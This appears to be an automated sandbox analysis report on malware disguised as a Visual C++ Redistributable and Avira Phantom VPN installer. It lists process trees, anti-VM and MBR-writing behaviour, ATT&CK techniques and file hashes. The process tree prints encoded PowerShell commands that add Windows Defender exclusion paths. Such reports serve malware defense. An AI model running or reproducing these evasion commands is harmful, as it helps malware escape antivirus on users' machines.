- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\WebrootCommAgentService.bat""
6⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAXABBAHAAcABEAGEAdABhACcAKQA=
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
"C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp" /SL5="$201EC,7215309,64512,C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\net.exe
"net" stop "AviraPhantomVPN"
8⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AviraPhantomVPN"
9⤵
PID:1664

C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\\VCR-2005-2023-09.02.2023.exe"
6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:300

C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\\VCR-2005-2023-09.02.2023.exe"
7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1332

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.exe
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\ProgramData\mntemp
Filesize
16B

MD5
10713815c03bd997648d64ae59e69d6c

SHA1
7631b6c32697dd5051bd70ce4d2458b2673d070e

SHA256
2dc669f02bdc7629ca154666c766c413163aed5dc27d93201d576272e5a3ad91

SHA512
a9ccb87fafcad7eaaf051e937684d6aa9ab616bbcbeb99a35dd2b7ac9543392b893e5036755d25f5a32bd0790e2e8117d700143ef28f729b346b56415646f5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe
Filesize
28.6MB

MD5
9466d6ac58ac215fb36794ce3f06a4e7

SHA1
d1ced42f619c5b4cc60951bd25287154974d3bff

SHA256
21558bfc700970d50d5bd91e9908582e17660279c2250e16fd45aef1f68ea6e9

SHA512
c7f1a0abf62359083bee4b33dcc8add0b4c5d55f240b0fa383e24c2f9992d40c8012d1ea71bb3b49a5bc0d67fe447361cf91d3d1bff7c564d6a7d36aea5606a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3002\python39.dll
Filesize
4.3MB

MD5
7e9d14aa762a46bb5ebac14fbaeaa238

SHA1
a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9

SHA256
e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3

SHA512
280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
187.9MB

MD5
1547ef3994c7322edcaf7fc8cb2fd3fc

SHA1
e1b5b038aedd3a884a05514a1e74509367223927

SHA256
a9e89ca7ccce1816542c02125f3f8a72707a95ba6bd464f4040166793f6a3b13

SHA512
7f3679f2f0b425574e6587755ee83511d4fbc09a5d9d2cf5cc06d2b094f4642cefe0e1ca9b50f94be40cdc7bf492229aa0ead7376d6394a7d8911611bede4c23

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
89.2MB

MD5
a24185e449b039f636754219342944e7

SHA1
7ba888d55df172f4b300ac9b4091c2a5456e2468

SHA256
bd99a0f0fbcb9b06422fba4f07a6a37de41dbf7f31927e74a94d1b3dc9092643

SHA512
20e7d97d79703c6730dd4253be1ed772e25741fb84f8261ef5a68210c5e11fd254a8de5a90f91fb337afa2a653a791c66671987831d6d2aabe48a97d9ca32580

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
59.9MB

MD5
43bdec28f3be2474382b279d084666e1

SHA1
7c0d7fcda08b30829e91c593db84f2155a38827b

SHA256
b15a91ed897526f799efe049821fd59735a867f63cd86e673e9764f3eff9b71b

SHA512
941daf709259d19d2e5ce357389f27e198d18052ba7b724f0347118f0188684a8056cb60b4ab1efd5cd8103d8ffc22f3178ad93dc41684073043bc5b14802373

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\WebrootCommAgentService.bat
Filesize
465B

MD5
357f5b062141f4f796a463e2ca373a9f

SHA1
c5eded68e24b0e9a05ec852205e181e9f33eaa00

SHA256
c909ac1fca71db5a322994ec8eb956a1c0c0fbb83410af38c6d4a8922381d373

SHA512
43bce27cffb7949eb9394e4006b3f91cffd89d6564a0fabb6f49beb15e33c243eda71f69be25c0c8e688edc907656d5fd6b2dff6c862b5c94f5562bdfcb14041

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp
Filesize
911KB

MD5
02c5691af81933ce36735946e3ed1ea4

SHA1
2faed8d51a0800f127e424bfba9d44bab6aee1b2

SHA256
e1f5e87796c015e567153db6b994a35a34b0819b1093d1ea12064ee35102c42d

SHA512
ebde4772c94f5199a2936f8fdbcf80e57d11a820276b1e1323fbcde6d192cd89bcc69a441cff17e26d688427fe05e62cc858e896c0647d93c9e2ebe74a6e6749

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\08FWBUZK5M7ZMRM9PMCZ.temp
Filesize
7KB

MD5
0551a45b547df5e6b866f57ecab217fe

SHA1
fe06984bcd4da4d7d0ad527350668a0a4237b2d5

SHA256
089337dcdffcf9e49e10ef1efd380bf8d9d0731d537e9eeda8e9434ad0021d36

SHA512
b49c0d00f11387bff5cf9eb4f1935fc194bf922e8fb0519b35475b690cd546e544ffe9875b7370eee61f30e9fdb71cd71de42ec901b7a59628123c514d83a206

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0551a45b547df5e6b866f57ecab217fe

SHA1
fe06984bcd4da4d7d0ad527350668a0a4237b2d5

SHA256
089337dcdffcf9e49e10ef1efd380bf8d9d0731d537e9eeda8e9434ad0021d36

SHA512
b49c0d00f11387bff5cf9eb4f1935fc194bf922e8fb0519b35475b690cd546e544ffe9875b7370eee61f30e9fdb71cd71de42ec901b7a59628123c514d83a206

Download Submit
\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
Filesize
7.2MB

MD5
bf245b7db7637e6b2991105f62cc76de

SHA1
1d7252929d5c4cb404a34e553b72757729c701d5

SHA256
c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89

SHA512
08380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI3002\python39.dll
Filesize
4.3MB

MD5
7e9d14aa762a46bb5ebac14fbaeaa238

SHA1
a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9

SHA256
e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3

SHA512
280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023

Download Submit
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\ISTask.dll
Filesize
66KB

MD5
86a1311d51c00b278cb7f27796ea442e

SHA1
ac08ac9d08f8f5380e2a9a65f4117862aa861a19

SHA256
e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

SHA512
129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

Download Submit
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\VclStylesInno.dll
Filesize
3.0MB

MD5
b0ca93ceb050a2feff0b19e65072bbb5

SHA1
7ebbbbe2d2acd8fd516f824338d254a33b69f08d

SHA256
0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

SHA512
37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

Download Submit
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
203.8MB

MD5
15e605889d7f61f878efa3c1d9d728f1

SHA1
97f89ac691e046425e6f713f87bf7cc3e232fa90

SHA256
ed9416c9cb0d3362e1339362ad5d7a6495be9d0946d79b089728c53ec0d96cee

SHA512
03089c324e91d6838b886695e6c3760929a9f02d87fd5b2ff2334f975f5d38884537eeb48dedf8d5a3ba10319a1192e61b861ab7f38f262cbf0359786c13a598

Download Submit
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe
Filesize
60.0MB

MD5
7ff90e94bc9c2798eb29f620dbbb5e96

SHA1
1d31cba5ec2723daa93b9fda3b90ddc6ce72599b

SHA256
ac50afe66c2ef410cbaef2dd34c2bf9c5ebe754d820cc04ca575ad657cf36e61

SHA512
7f78547c85fb57bb67ba8a65b8193c1e9d017773478707a7e7fc6865c8eb9a8284822c069c896b937114a42bf484901202afd142643218e5951fb017e7390a08

Download Submit
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\_isetup\_isdecmp.dll
Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\innocallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp
Filesize
3.2MB

MD5
709f58ff64c336a777ab15d80e18202c

SHA1
7c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3

SHA256
a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003

SHA512
59af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5

Download Submit
\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp
Filesize
911KB

MD5
02c5691af81933ce36735946e3ed1ea4

SHA1
2faed8d51a0800f127e424bfba9d44bab6aee1b2

SHA256
e1f5e87796c015e567153db6b994a35a34b0819b1093d1ea12064ee35102c42d

SHA512
ebde4772c94f5199a2936f8fdbcf80e57d11a820276b1e1323fbcde6d192cd89bcc69a441cff17e26d688427fe05e62cc858e896c0647d93c9e2ebe74a6e6749

Download Submit
memory/300-311-0x00000000023A0000-0x00000000038CE000-memory.dmp

Filesize
21.2MB

Download
memory/300-175-0x000000013F1F0000-0x000000014071E000-memory.dmp

Filesize
21.2MB

Download
memory/300-229-0x000000013F1F0000-0x000000014071E000-memory.dmp

Filesize
21.2MB

Download
memory/300-260-0x000000013F1F0000-0x000000014071E000-memory.dmp

Filesize
21.2MB

Download
memory/300-332-0x00000000023A0000-0x00000000038CE000-memory.dmp

Filesize
21.2MB

Download
memory/596-184-0x0000000000400000-0x000000000050D000-memory.dmp

Filesize
1.1MB

Download
memory/596-100-0x0000000000400000-0x000000000050D000-memory.dmp

Filesize
1.1MB

Download
memory/596-91-0x0000000000400000-0x000000000050D000-memory.dmp

Filesize
1.1MB

Download
memory/1048-152-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1048-227-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1124-78-0x0000000003750000-0x0000000003760000-memory.dmp

Filesize
64KB

Download
memory/1124-79-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/1332-312-0x000000013F1F0000-0x000000014071E000-memory.dmp

Filesize
21.2MB

Download
memory/1332-333-0x000000013F1F0000-0x000000014071E000-memory.dmp

Filesize
21.2MB

Download
memory/1488-139-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/1488-140-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/1572-196-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/1572-217-0x0000000002130000-0x0000000002131000-memory.dmp

Filesize
4KB

Download
memory/1572-194-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-197-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-198-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-199-0x0000000002090000-0x0000000002091000-memory.dmp

Filesize
4KB

Download
memory/1572-200-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-201-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-203-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-204-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-202-0x00000000020E0000-0x00000000020E1000-memory.dmp

Filesize
4KB

Download
memory/1572-206-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-205-0x00000000020F0000-0x00000000020F1000-memory.dmp

Filesize
4KB

Download
memory/1572-207-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-208-0x0000000002100000-0x0000000002101000-memory.dmp

Filesize
4KB

Download
memory/1572-210-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-209-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-213-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-215-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-214-0x0000000002120000-0x0000000002121000-memory.dmp

Filesize
4KB

Download
memory/1572-216-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-218-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-219-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-220-0x0000000002140000-0x0000000002141000-memory.dmp

Filesize
4KB

Download
memory/1572-221-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-195-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-223-0x0000000002150000-0x0000000002151000-memory.dmp

Filesize
4KB

Download
memory/1572-222-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-224-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-212-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-225-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-211-0x0000000002110000-0x0000000002111000-memory.dmp

Filesize
4KB

Download
memory/1572-193-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/1572-228-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-230-0x0000000007220000-0x0000000007360000-memory.dmp

Filesize
1.2MB

Download
memory/1572-231-0x0000000002170000-0x0000000002171000-memory.dmp

Filesize
4KB

Download
memory/1572-191-0x0000000006F00000-0x000000000721A000-memory.dmp

Filesize
3.1MB

Download
memory/1572-226-0x0000000002160000-0x0000000002161000-memory.dmp

Filesize
4KB

Download
memory/1572-187-0x0000000000880000-0x0000000000896000-memory.dmp

Filesize
88KB

Download
memory/1572-268-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/1572-272-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1572-185-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1596-182-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/1596-176-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/1596-164-0x0000000003960000-0x0000000004E8E000-memory.dmp

Filesize
21.2MB

Download
memory/1596-130-0x0000000003440000-0x0000000003455000-memory.dmp

Filesize
84KB

Download
memory/1596-129-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/1596-121-0x0000000003440000-0x0000000003455000-memory.dmp

Filesize
84KB

Download
memory/1596-105-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1596-101-0x0000000000400000-0x0000000000747000-memory.dmp

Filesize
3.3MB

Download
memory/1596-99-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads